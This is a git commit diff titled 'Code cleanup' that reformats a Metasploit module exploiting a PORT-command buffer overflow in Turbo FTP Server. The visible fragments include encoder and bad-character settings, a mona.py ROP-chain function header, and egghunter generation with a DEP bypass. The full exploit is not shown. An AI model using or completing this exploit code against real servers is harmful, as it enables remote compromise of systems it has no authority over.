Code cleanup
This commit is contained in:
parent
6bccfcd376
commit
72d70b6bc2
|
@ -1,7 +1,3 @@
|
||||||
##
|
|
||||||
#
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
@ -24,28 +20,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
This module exploits the buffer overflow found in the PORT
|
This module exploits the buffer overflow found in the PORT
|
||||||
command in Turbo FTP Server 1.30.823 & 1.30.826.
|
command in Turbo FTP Server 1.30.823 & 1.30.826.
|
||||||
},
|
},
|
||||||
'Author' => [
|
'Author' =>
|
||||||
|
[
|
||||||
'Zhao Liang', #Initial Descovery
|
'Zhao Liang', #Initial Descovery
|
||||||
'Lincoln', #Metasploit
|
'Lincoln', #Metasploit
|
||||||
'corelanc0d3r', #Metasploit
|
'corelanc0d3r', #Metasploit
|
||||||
'thelightcosine',#Metasploit
|
'thelightcosine' #Metasploit
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$',
|
|
||||||
'Platform' => [ 'win' ],
|
'Platform' => [ 'win' ],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'OSVDB', '85887' ],
|
[ 'OSVDB', '85887' ]
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00",
|
'BadChars' => "\x00",
|
||||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||||
'EncoderOptions' =>
|
'EncoderOptions' => { 'BufferRegister' => 'EDI' }
|
||||||
{
|
|
||||||
'BufferRegister' => 'EDI',
|
|
||||||
}
|
|
||||||
|
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
|
@ -66,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
|
|
||||||
'DisclosureDate' => 'Oct 03 2012',
|
'DisclosureDate' => 'Oct 03 2012',
|
||||||
'DefaultTarget' => 1))
|
'DefaultTarget' => 0))
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
@ -82,7 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def create_rop_chain(ver)
|
def create_rop_chain(ver)
|
||||||
|
|
||||||
# rop chain generated with mona.py - www.corelan.be
|
# rop chain generated with mona.py - www.corelan.be
|
||||||
if ver == 823
|
if ver == 823
|
||||||
rop_gadgets =
|
rop_gadgets =
|
||||||
|
@ -135,7 +126,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
my_target = target
|
my_target = target
|
||||||
if my_target.name == 'Automatic'
|
if my_target.name == 'Automatic'
|
||||||
print_status("Automatically detecting the target")
|
print_status("Automatically detecting the target")
|
||||||
|
@ -167,6 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
:depmethod => 'virtualalloc',
|
:depmethod => 'virtualalloc',
|
||||||
:depreg => 'esi'
|
:depreg => 'esi'
|
||||||
}
|
}
|
||||||
|
|
||||||
badchars = "\x00"
|
badchars = "\x00"
|
||||||
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
|
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue